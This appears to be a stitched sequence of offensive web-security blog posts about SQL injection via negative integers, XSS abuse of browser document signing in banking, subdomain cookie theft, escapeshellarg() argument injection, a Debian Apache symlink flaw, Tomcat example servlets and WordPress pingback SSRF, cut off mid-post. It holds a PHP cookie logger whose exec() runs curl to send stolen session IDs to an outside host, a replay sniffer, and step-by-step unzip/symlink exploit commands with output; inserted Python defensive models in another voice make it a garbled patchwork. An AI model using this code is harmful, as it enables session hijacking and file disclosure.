<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #0053ff; font-weight: 700;">$action</span> <span style="color: #006699; font-weight: 700;">=</span> <span style="color: #0053ff; font-weight: 700;">$_GET</span>[<span style="color: #666666;">'do'</span>];
<span style="color: #0053ff; font-weight: 700;">$r</span><span style="color: #006699; font-weight: 700;">=</span><span style="color: #0053ff; font-weight: 700;">$db</span><span style="color: #006699; font-weight: 700;">-></span>query(<span style="color: #666666;">"select role"</span><span style="color: #006699; font-weight: 700;">.</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$action</span>)<span style="color: #006699; font-weight: 700;">.</span><span style="color: #666666;">" from users where id="</span><span style="color: #006699; font-weight: 700;">.</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$_SESSION</span>[<span style="color: #666666;">'user_id'</span>]));
<span style="color: #006699; font-weight: 700;">if</span>(<span style="color: #0053ff; font-weight: 700;">$row</span><span style="color: #006699; font-weight: 700;">=</span><span style="color: #0053ff; font-weight: 700;">$r</span><span style="color: #006699; font-weight: 700;">-></span>fetchArray()){
<span style="color: #006699; font-weight: 700;"> if</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$row</span>[<span style="color: #a8017e;">0</span>]<span style="color: #006699; font-weight: 700;">!</span><span style="color: #006699; font-weight: 700;">==</span><span style="color: #a8017e;">1</span>){
<span style="color: #006699; font-weight: 700;"> die</span>(<span style="color: #666666;">'permission denied'</span>);
}<span style="color: #006699; font-weight: 700;">else</span>{
doAction(<span style="color: #0053ff; font-weight: 700;">$action</span>);
}
}</pre>
<br />
<br />
This code looks SQLi-protected, but it is not.<br />
<br />
Do not forget two obvious facts:<br />
1. Minus is an SQL operator<br />
2. Numbers can be negative<br />
<br />
Now it is easy to understand the SQL logic in this case (without injection):<br />
<br />
<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #006699; font-weight: 700;">select</span> role0 <span style="color: #006699; font-weight: 700;">from</span> users <span style="color: #006699; font-weight: 700;">where</span> id<span style="color: #006699; font-weight: 700;">=</span><span style="color: #a8017e;">0</span></pre>
<br />
And the SQL injection attack vector in this case:<br />
<br />
<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #006699; font-weight: 700;">select</span> role<span style="color: #006699; font-weight: 700;">-</span><span style="color: #a8017e;">1</span> <span style="color: #006699; font-weight: 700;">from</span> users <span style="color: #006699; font-weight: 700;">where</span> id<span style="color: #006699; font-weight: 700;">=</span><span style="color: #a8017e;">0</span></pre>
<br />
<br />
In our example the attacker can bypass the authorization check.<br />
This example requires both <span style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em;">role</span> and <span style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em;">role0</span> to exist in the database.</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com30tag:blogger.com,1999:blog-7173843122198586393.post-51436414415419692222013-04-24T07:25:00.002-07:002013-04-24T07:25:36.302-07:00How XSS can defeat your digital signatures<div dir="ltr" style="text-align: left;" trbidi="on">
Recently we exploited a nice XSS vector in one of the RBS (Remote Banking Service) systems. This example shows very well how dangerous a client-side attack can be.<br />
<br />
After authorization the client could sign electronic documents.<br />
For signing from the browser the developers used the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa375732(v=vs.85).aspx">CAPICOM</a> technology.<br />
<br />
If you have already understood us, you need not finish reading this note ;)<br />
<br />
Signing from JavaScript is easy and useful for client-side attacks.<br />
The JS code for signing a document looks like:<br />
<br />
<br />
<br />
<pre><span style="color: maroon; font-weight: bold;">function</span> SignCreate<span style="color: #808030;">(</span>certSubjectName<span style="color: #808030;">,</span> <b><span style="color: red;">dataToSign</span></b><span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">var</span> oStore <span style="color: #808030;">=</span> CreateObject<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">CAPICOM.Store</span><span style="color: maroon;">"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
oStore<span style="color: #808030;">.</span>Open<span style="color: #808030;">(</span>CAPICOM_CURRENT_USER_STORE<span style="color: #808030;">,</span> CAPICOM_MY_STORE<span style="color: #808030;">,</span>
CAPICOM_STORE_OPEN_MAXIMUM_ALLOWED<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">var</span> oCertificates <span style="color: #808030;">=</span> oStore<span style="color: #808030;">.</span>Certificates<span style="color: #808030;">.</span>Find<span style="color: #808030;">(</span>
CAPICOM_CERTIFICATE_FIND_SUBJECT_NAME<span style="color: #808030;">,</span> certSubjectName<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">if</span> <span style="color: #808030;">(</span>oCertificates<span style="color: #808030;">.</span>Count <span style="color: #808030;">==</span> <span style="color: #008c00;">0</span><span style="color: #808030;">)</span> <span style="color: purple;">{</span>
alert<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">Certificate not found: </span><span style="color: maroon;">"</span> <span style="color: #808030;">+</span> certSubjectName<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">return</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span></pre>
<pre><span style="color: purple;"> ...</span></pre>
<br />
<br />
You can easily call this function from a stored/reflected XSS to sign arbitrary data.<br />
To solve the PIN-entry problem we used the key caching mechanism: most often, after the PIN code of the key has been entered, the PIN is remembered for a while.<br />
<br />
So we were able to sign an arbitrary (injected) document immediately after the user signed his own document (and entered the PIN, of course).<br />
<br />
Then, using JavaScript, we were able to hide the injected signed document from the user's orders table (the document was an order request) for the current user.<br />
<br />
So a single stored XSS vulnerability defeated all the security measures of the RBS system. Note that typical protections such as httpOnly cookies and SSL were in place, but they did not help.<br />
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com31tag:blogger.com,1999:blog-7173843122198586393.post-78951702944067782532013-04-08T02:49:00.002-07:002013-04-08T02:49:50.392-07:00Exploiting server-side vulns as client-side?!!<div dir="ltr" style="text-align: left;" trbidi="on">
Sounds terrible, doesn't it? This post is obvious, of course ;)<br />
<br />
But sometimes this is an effective attack vector, for example whenever you can exploit some subdomain (news.your-target.com) but cannot exploit the main domain (your-target.com).<br />
<br />
You can capture cookies on any subdomain even if they are protected by httpOnly/Secure.<br />
Look at RFC6265 <a href="http://tools.ietf.org/html/rfc6265">http://tools.ietf.org/html/rfc6265</a>:<br />
<br />
<pre class="newpage" style="font-size: 1em; page-break-before: always;"><span class="h5" style="display: inline; font-size: 1em; font-weight: bold; line-height: 0pt;"><h5 style="display: inline; font-size: 1em; line-height: 0pt;">
<a class="selflink" href="http://tools.ietf.org/html/rfc6265#section-4.1.2.3" name="section-4.1.2.3" style="color: black; text-decoration: none;">4.1.2.3</a>. The Domain Attribute</h5>
</span>
The Domain attribute specifies those hosts to which the cookie will
be sent. For example, if the value of the Domain attribute is
"example.com", the user agent will include the cookie in the Cookie
header when making HTTP requests to example.com, www.example.com, and
www.corp.example.com. (Note that a leading %x2E ("."), if present,
is ignored even though that character is not permitted, but a
trailing %x2E ("."), if present, will cause the user agent to ignore
the attribute.) If the server omits the Domain attribute, the user
agent will return the cookie only to the origin server.</pre>
<pre class="newpage" style="font-size: 1em; page-break-before: always;"><div style="font-family: Times; font-size: medium; white-space: normal;">
Capturing cookies is possible when the main server sends a Set-Cookie header with the "domain" attribute.<br />
A logger to inject into the subdomain may look like:<br />
<pre style="background-color: white; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><?php
// runs on the exploited subdomain; the browser sends the cookie here because its
// Domain attribute covers every subdomain, and httpOnly does not change that
session_start();
// the cookie value must match the expected format before it is placed in a shell command
if(!isset($_COOKIE['session_id']) || !preg_match('/$ASYOUWANT^/s',$_COOKIE['session_id']) || isset($_SESSION['already_logged'])){
    //do nothing
}else{
    //exec called for asynchronous request: the trailing " &" backgrounds curl
    exec("curl http://security-auditor.com/sniffer.php?session_id=".$_COOKIE['session_id']." &");//httpOnly cookie of course
    $_SESSION['already_logged']=true;
}
?></pre>
Simple code of described sniffer listed below:
<br />
<pre style="background-color: white; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><?php
$ssid = @$_GET['session_id'];
if($ssid!=""){
    // download page as a client
    $opts = array(
        'http'=>array(
            'method'=>"GET",
            'header'=>"Accept-language: en\r\n" .
                      "Cookie: session_id=$ssid;\r\n"
        )
    );
    $context = stream_context_create($opts);
    $file = file_get_contents('https://target.com/settings', false, $context);
    if(!file_exists("/tmp/sess-$ssid")){
        file_put_contents("/tmp/sess-$ssid","Cookie: session_id=$ssid; \n".$file );
    }
}
?></pre>
</div>
</pre>
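The RFC 6265 domain rules quoted above, together with the Secure-flag mitigation from the earlier post on private DNS records, modelled as an added example that belongs to neither post: browser_sends decides whether a conforming browser attaches a cookie to a request, and exposure runs one session cookie, issued three ways, against the request URLs those posts discuss. Cookie names, hosts and URLs are constructed.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit
import ipaddress


@dataclass
class Cookie:
    name: str
    origin_host: str                 # host that issued the Set-Cookie header
    domain: Optional[str] = None     # raw Domain attribute, None if omitted
    secure: bool = False
    http_only: bool = False


def normalize_domain_attribute(value: Optional[str]) -> Optional[str]:
    """RFC 6265 4.1.2.3 as quoted above: a leading '.' is ignored, a trailing
    '.' makes the user agent ignore the attribute (the cookie is host-only)."""
    if value is None or value.endswith("."):
        return None
    return value.lstrip(".").lower() or None


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 5.1.3: identical strings, or host is a subdomain of domain and
    host is not an IP address literal."""
    host, domain = host.lower(), domain.lower()
    if host == domain:
        return True
    try:
        ipaddress.ip_address(host)
        return False                 # an IP literal never domain-matches
    except ValueError:
        return host.endswith("." + domain)


def browser_sends(cookie: Cookie, url: str) -> bool:
    """Would a conforming browser attach `cookie` to a request for `url`?
    HttpOnly is deliberately not consulted: it hides the cookie from script
    but never stops the browser from sending it, which is the point above."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if cookie.secure and parts.scheme != "https":
        return False
    domain = normalize_domain_attribute(cookie.domain)
    if domain is None:
        return host.lower() == cookie.origin_host.lower()   # host-only cookie
    return domain_matches(host, domain)


# Constructed: the same session cookie issued three ways by www.company.com.
WIDE = Cookie("session_id", "www.company.com", domain="company.com", http_only=True)
SECURE = Cookie("session_id", "www.company.com", domain="company.com",
                http_only=True, secure=True)
HOST_ONLY = Cookie("session_id", "www.company.com", http_only=True)

REQUESTS = (
    "http://local.company.com/",          # attacker answering a private A record
    "https://news.company.com/",          # exploited subdomain over TLS
    "https://www.company.com/",           # the legitimate origin
    "http://company.com.evil.example/",   # lookalike host, must never match
)


def exposure(cookie: Cookie) -> dict:
    """Map each request URL to whether the cookie would be sent there."""
    return {url: browser_sends(cookie, url) for url in REQUESTS}


if __name__ == "__main__":
    for label, c in (("Domain=company.com", WIDE), ("+ Secure", SECURE), ("host-only", HOST_ONLY)):
        print(label, exposure(c))
```

Secure stops the plain-http variant but still hands the cookie to any subdomain served over https, so only a host-only cookie (no Domain attribute) keeps the session out of a compromised subdomain.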
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com28tag:blogger.com,1999:blog-7173843122198586393.post-35815921052569934032013-03-24T12:28:00.002-07:002013-03-24T12:31:24.503-07:00Breaking escapeshellarg() news<div dir="ltr" style="text-align: left;" trbidi="on">
PHP function <a href="http://php.net/manual/en/function.escapeshellarg.php">escapeshellarg()</a> is the most popular way to prevent <a href="http://projects.webappsec.org/w/page/13246950/OS%20Commanding">OS Commanding</a> threats during shell calls by escaping command arguments.<br />
<br />
But this function is not a panacea, and you should keep this in mind when using it.<br />
<br />
Let's try to understand what this escaping function does:<br />
<ol style="text-align: left;">
<li>Wraps the string in single quotes: aaa -> 'aaa'</li>
<li>Cuts bytes 0x00, 0x80-0xFF</li>
<li>Escapes single quotes: ' -> ''\'''</li>
</ol>
This guarantees that the string becomes exactly one command-line argument.<br />
So it looks like an ideal solution, right?<br />
<br />
But there are no restrictions on the characters in this argument. For example, a command-line argument after escapeshellarg() filtration <b><span style="color: red;">can be a command option</span></b> (-a, -o and others). <b>This is the first trick.</b><br />
<br />
<b>The second trick</b> is the argument parser embedded in command-line utilities.<br />
<br />
Look at these:<br />
$command -arg param<br />
$command -arg=param<br />
<span style="color: red;"><b>$command '-arg=param'</b></span><br />
<span style="color: red;"><b>$command '-arg param'</b></span><br />
<br />
For most command-line utilities there is no difference between these four examples! Pay attention to the last two command lines: you can pass exactly these after escapeshellarg() filtration.<br />
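A model of the three escapeshellarg() rules above and of the argv a utility actually receives, added as an example and not taken from PHP's source: the quoted value survives shell word-splitting as a single argument that is still an option string, and safe_archive_arg shows the allow-list check the unzip example below needs. The `unzip -j ... -d /tmp` command line is the one from this post; php_escapeshellarg follows only the rules the post lists.

```python
import re
import shlex


def php_escapeshellarg(arg: str) -> str:
    """Model of escapeshellarg() per the post: drop NUL and bytes 0x80-0xFF,
    turn each ' into '\\'' and wrap the result in single quotes. (Real PHP
    drops bytes according to the current locale; this keeps only the three
    rules listed above.)"""
    kept = "".join(ch for ch in arg if 0 < ord(ch) < 0x80)
    return "'" + kept.replace("'", "'\\''") + "'"


def build_unzip_command(zip_arch_name: str) -> str:
    """The command line the post's exec() call produces."""
    return "unzip -j " + php_escapeshellarg(zip_arch_name) + " *.dat -d /tmp"


def shell_argv(command_line: str) -> list:
    """Word-split as a POSIX shell would: what the utility sees as argv."""
    return shlex.split(command_line)


def option_like_args(argv: list) -> list:
    """Arguments the utility's own parser may take as options. escapeshellarg
    guarantees one argv entry per value, not that the value is not an option."""
    return [a for a in argv[1:] if a.startswith("-")]


# Hardening: a bare file name that cannot begin with '-' and has no '/'.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def safe_archive_arg(zip_arch_name: str) -> str:
    """Allow-list the name before escaping it. Prefixing './' to a file
    argument is the other common fix for the option-lookalike problem."""
    if not SAFE_NAME.fullmatch(zip_arch_name):
        raise ValueError("rejected archive name: %r" % zip_arch_name)
    return php_escapeshellarg(zip_arch_name)


if __name__ == "__main__":
    for name in ("1.dat", "it's.dat", "-d/var/www/"):
        cmd = build_unzip_command(name)
        argv = shell_argv(cmd)
        print(cmd)
        print("   argv:", argv, "option-like:", option_like_args(argv))
```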
<br />
<b>Example:</b><br />
<pre><?php
exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
?></pre>
Is this code protected from hackers? Try to check it in a terminal by typing:<br />
<b>$ unzip -j <span style="color: red;">'-d/var/www/'</span> *.dat -d /tmp</b><br />
<br />
This command extracts the files matching the masks '*.dat' (all matches after the first one), '-d' and '/tmp' from the ZIP archive named *.dat into the output folder /var/www.<br />
<br />
Preparing the exploit:<br />
$ ln -s /etc/hosts 2.dat<br />
$ zip --symlinks 1.zip 2.dat<br />
$ mv 1.zip 1.dat<br />
<br />
You can also add a file named '-d' to the archive to make the attack more stable (without needing to upload both 1.dat and 2.dat for the exploit).<br />
<br />
Try it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho-Jd5zzWAMQGmwy-gX-tXBguRZYM992dK-MkUiRY1znRY6F7p1UcwTCYfylAJ6ujIhHTk7hWnnJ46AZWTUQwBdDwKN2UbJ76O01t05xMSP9nbAABQyFi1_dje_gKoV74sI-eHxB-0gyY/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-03-24+%25D0%25B2+23.10.29.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho-Jd5zzWAMQGmwy-gX-tXBguRZYM992dK-MkUiRY1znRY6F7p1UcwTCYfylAJ6ujIhHTk7hWnnJ46AZWTUQwBdDwKN2UbJ76O01t05xMSP9nbAABQyFi1_dje_gKoV74sI-eHxB-0gyY/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-03-24+%25D0%25B2+23.10.29.png" /></a></div>
$ unzip -j '-d/var/www' *.dat -d /tmp<br />
Archive: 1.dat<br />
linking: /var/www/2.dat -> /etc/hosts<br />
finishing deferred symbolic links:<br />
/var/www/2.dat -> /etc/hosts<br />
caution: filename not matched: -d<br />
caution: filename not matched: /tmp<br />
<br />
Now you can read files through +FollowSymLinks -------------></div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com23tag:blogger.com,1999:blog-7173843122198586393.post-45859544033282020652013-03-05T15:07:00.000-08:002013-03-06T04:01:09.952-08:00Analysis of CVE-2013-1048<div dir="ltr" style="text-align: left;" trbidi="on">
Today we were very surprised by the vulnerability CVE-2013-1048 in the Apache web server. This issue was described in <a href="http://www.debian.org/security/2013/dsa-2637">Debian Security Advisory DSA-2637-1</a> with the following notes:<br />
<br />
<blockquote class="tr_bq">
Hayawardh Vijayakumar noticed that the apache2ctl script created the lock directory in an unsafe manner, allowing a local attacker to gain elevated privileges via a symlink attack. This is a Debian specific issue.</blockquote>
First, look at the last line of the quote: only Debian systems were affected.<br />
<br />
Let's try to analyse the <a href="http://anonscm.debian.org/gitweb/?p=pkg-apache/apache2.git;a=commitdiff;h=e8559f83064458ce36b421e197df864da03b5754">patch for this bug</a>:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi41Dx75DmkpntLiFD8WYZA9dg5XlDOfEubIN2ssjMPh26P-i72JMieVMiBcoUt5A4umj7FB0BNIDCHFXws5TTk154yFxQRXVBEB8dAMQDFHU48LLxwQ4AhZdm38xZ0XhsR4TSQRlGMqF0/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-06+%D0%B2+2.27.41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi41Dx75DmkpntLiFD8WYZA9dg5XlDOfEubIN2ssjMPh26P-i72JMieVMiBcoUt5A4umj7FB0BNIDCHFXws5TTk154yFxQRXVBEB8dAMQDFHU48LLxwQ4AhZdm38xZ0XhsR4TSQRlGMqF0/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-06+%D0%B2+2.27.41.png" /></a></div>
<br />
<br />
As you can see, the <b>install</b> command was replaced with a <b>mkdir_chown</b> function which contains many security checks.<br />
<br />
Let's try to understand what happens when "install -d -o www-data /var/lock/apache" is called.<br />
<br />
This command creates the directory /var/lock/apache and then changes its owner to www-data.<br />
<br />
But if this directory was already created as a symlink to another directory (/var/lock has <b>a+w</b> privileges), the <b>install</b> command changes the ownership of the directory the link points to. The simplest exploitation path is to create /var/lock/apache as a symlink to the /etc/ directory, then delete the /etc/shadow file and recreate it with your own content under <b>www-data</b> user privileges.</div>
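Hypothetical Python counterparts of the two behaviours, added here and not taken from the Debian patch: naive_mkdir_chown models what "install -d -o" amounts to on a planted symlink, and mkdir_chown applies the lstat/O_NOFOLLOW/fstat checks a safe version needs. The temporary directory layout is constructed, and uid/gid stay -1 so no real ownership change is attempted and it runs unprivileged.

```python
import os
import stat
import tempfile


class UnsafeDirectory(Exception):
    """Raised instead of acting through a planted symlink."""


def naive_mkdir_chown(path: str, uid: int = -1, gid: int = -1) -> str:
    """What "install -d -o user path" amounts to: an existing entry is accepted
    if it *looks* like a directory (symlinks are followed) and chown() follows
    the link too, so the ownership change lands on the link's target."""
    os.makedirs(path, exist_ok=True)
    os.chown(path, uid, gid)              # follows symlinks
    return os.path.realpath(path)         # where the change actually landed


def mkdir_chown(path: str, uid: int = -1, gid: int = -1, mode: int = 0o755) -> str:
    """Symlink-safe counterpart: create if missing, verify with lstat(), open
    with O_NOFOLLOW and chown through the descriptor, so nothing swapped in
    between the check and the chown can redirect it."""
    try:
        os.mkdir(path, mode)
    except FileExistsError:
        pass                              # already present: a directory or a planted link
    st = os.lstat(path)                   # lstat reports the link itself, never its target
    if stat.S_ISLNK(st.st_mode):
        raise UnsafeDirectory("%s is a symlink, refusing to chown through it" % path)
    if not stat.S_ISDIR(st.st_mode):
        raise UnsafeDirectory("%s exists but is not a directory" % path)
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        fst = os.fstat(fd)
        if (fst.st_dev, fst.st_ino) != (st.st_dev, st.st_ino):
            raise UnsafeDirectory("%s was replaced between check and open" % path)
        if (uid, gid) != (-1, -1):
            os.fchown(fd, uid, gid)       # acts on the opened inode only
    finally:
        os.close(fd)
    return path


def demo() -> dict:
    """Constructed layout: a writable lock directory in which an unprivileged
    user planted 'apache' as a symlink to a sensitive directory."""
    base = tempfile.mkdtemp()
    sensitive = os.path.join(base, "etc")
    os.mkdir(sensitive)
    planted = os.path.join(base, "apache")
    os.symlink(sensitive, planted)
    result = {"naive_landed_on_target":
              naive_mkdir_chown(planted) == os.path.realpath(sensitive)}
    try:
        mkdir_chown(planted)
        result["safe_refused"] = False
    except UnsafeDirectory:
        result["safe_refused"] = True
    fresh = os.path.join(base, "apache-new")
    mkdir_chown(fresh)
    result["safe_created_real_dir"] = os.path.isdir(fresh) and not os.path.islink(fresh)
    return result


if __name__ == "__main__":
    print(demo())
```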
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com11tag:blogger.com,1999:blog-7173843122198586393.post-49773634988233076692013-03-02T22:29:00.003-08:002013-03-02T22:29:39.480-08:00Tomcat Servlet Examples threats<div dir="ltr" style="text-align: left;" trbidi="on">
By default the Tomcat application server contains an "/examples" directory with many example servlets and JSPs.<br />
We strongly recommend disabling public access to this directory for the following security reasons:<br />
<br />
<ul style="text-align: left;">
<li>Bypassing HttpOnly Cookies protection</li>
<li>CSRF cookies manipulation</li>
<li>Session manipulation</li>
</ul>
<div>
The HttpOnly flag is meant to protect the user's cookies from client-side attacks such as XSS. There are two example servlets in Tomcat which print all cookies in a text/plain HTTP response:</div>
<div>
<ul style="text-align: left;">
<li><b>/examples/servlets/servlet/RequestHeaderExample</b></li>
<li><b>/examples/servlets/servlet/CookieExample</b></li>
</ul>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmBnbqcRM4Zg27sNshfzzH3HyupCLqrcs-XXZ95yvFxastq0FSGgn2v5C6OxrQYocXaqDAQjOC5_0KCdxOTLaMKabjyhCepuzAdwzQutTyfn9ugAoqvFZeWzG50WdtIdz6__Jq0gV-34M/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.21.01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmBnbqcRM4Zg27sNshfzzH3HyupCLqrcs-XXZ95yvFxastq0FSGgn2v5C6OxrQYocXaqDAQjOC5_0KCdxOTLaMKabjyhCepuzAdwzQutTyfn9ugAoqvFZeWzG50WdtIdz6__Jq0gV-34M/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.21.01.png" /></a>The second servlet also allows CSRF-based cookie manipulation: cookies can be set or redefined by both GET and POST requests.</div>
</div>
<div>
<br />
Session manipulation is more interesting. Look at the <b>/examples/servlets/servlet/SessionExample</b> servlet. It is the simplest way to gain admin privileges in target webapps hosted on the same Tomcat as the SessionExample servlet.<br />
<br />
The session is global and this servlet lets you perform any manipulation of your session!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPbBRwP1A4pHUlJ5Ic5Vt-eQUE7R-TVEQ3jqF4l0DCKwMBUzuhBbAUjFcxToY3-P2wrq2GeKA3g5UTcb3r9yf5Du21AMtQmSzaeKSQmLHY0NekV9HrvCrHFntK6_tn7W58YcF4Ao7TVs/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.26.37.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPbBRwP1A4pHUlJ5Ic5Vt-eQUE7R-TVEQ3jqF4l0DCKwMBUzuhBbAUjFcxToY3-P2wrq2GeKA3g5UTcb3r9yf5Du21AMtQmSzaeKSQmLHY0NekV9HrvCrHFntK6_tn7W58YcF4Ao7TVs/s320/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-03-03+%D0%B2+10.26.37.png" width="320" /></a><span style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><b>Once again, we strongly recommend disabling public access to the /examples directory.</b></span></div>
</div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com19tag:blogger.com,1999:blog-7173843122198586393.post-1930695486562237632013-01-04T17:42:00.002-08:002013-01-08T08:30:52.745-08:00WordPress XMLRPC pingback additional issues<div dir="ltr" style="text-align: left;" trbidi="on">
A vulnerability in the WordPress XMLRPC pingback function was recently published:<br />
<a href="http://www.ethicalhack3r.co.uk/introduction-to-the-wordpress-xml-rpc-api/">http://www.ethicalhack3r.co.uk/introduction-to-the-wordpress-xml-rpc-api/</a><br />
<br />
Basically this vuln can be used to scan open ports on localhost and the intranet:<br />
<a href="https://github.com/FireFart/WordpressPingbackPortScanner">https://github.com/FireFart/WordpressPingbackPortScanner</a><br />
<br />
<b>But in fact, this vulnerability is much wider!</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrjzkK8gH-5KLgVabSVyUZVhqKuLtfeF6-LDZ2XbA1f3CzCxhqwSUAcw4EPaONEHC-hYrjWCWl6wUISHMxDZKx1jOIMhgA4PfO2G0XaKU5_4vsR56ObhoaATNVyJdLGpebjeiQtVdtOA/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-01-05+%D0%B2+5.37.32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrjzkK8gH-5KLgVabSVyUZVhqKuLtfeF6-LDZ2XbA1f3CzCxhqwSUAcw4EPaONEHC-hYrjWCWl6wUISHMxDZKx1jOIMhgA4PfO2G0XaKU5_4vsR56ObhoaATNVyJdLGpebjeiQtVdtOA/s640/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-01-05+%D0%B2+5.37.32.png" width="640" /></a></div>
<b><br /></b>
First, look at "SSRF bible. Cheatsheet":<br />
<a href="https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit">https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit</a><br />
and our ZeroNights 0x02 presentation:<br />
<span style="color: #1155cc; font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><a href="http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities">http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities</a></span></span><br />
<br />
Let's try to exploit this bug as an <b>SSRF</b>!<br />
By default WP tries to use cURL (libcurl) to make requests:<br />
<br />
<code>
./wp-includes/class-wp-xmlrpc-server.php:<br />
4988 $linea = wp_remote_fopen( $pagelinkedfrom );
</code>
<br />
<code><br /></code>
<code>
./wp-includes/functions.php:<br />
749 function wp_remote_fopen( $uri ) {<br />
...<br />
758 $response = wp_remote_get( $uri, $options );
</code>
<br />
<code><br /></code>
<code>
./wp-includes/http.php:<br />
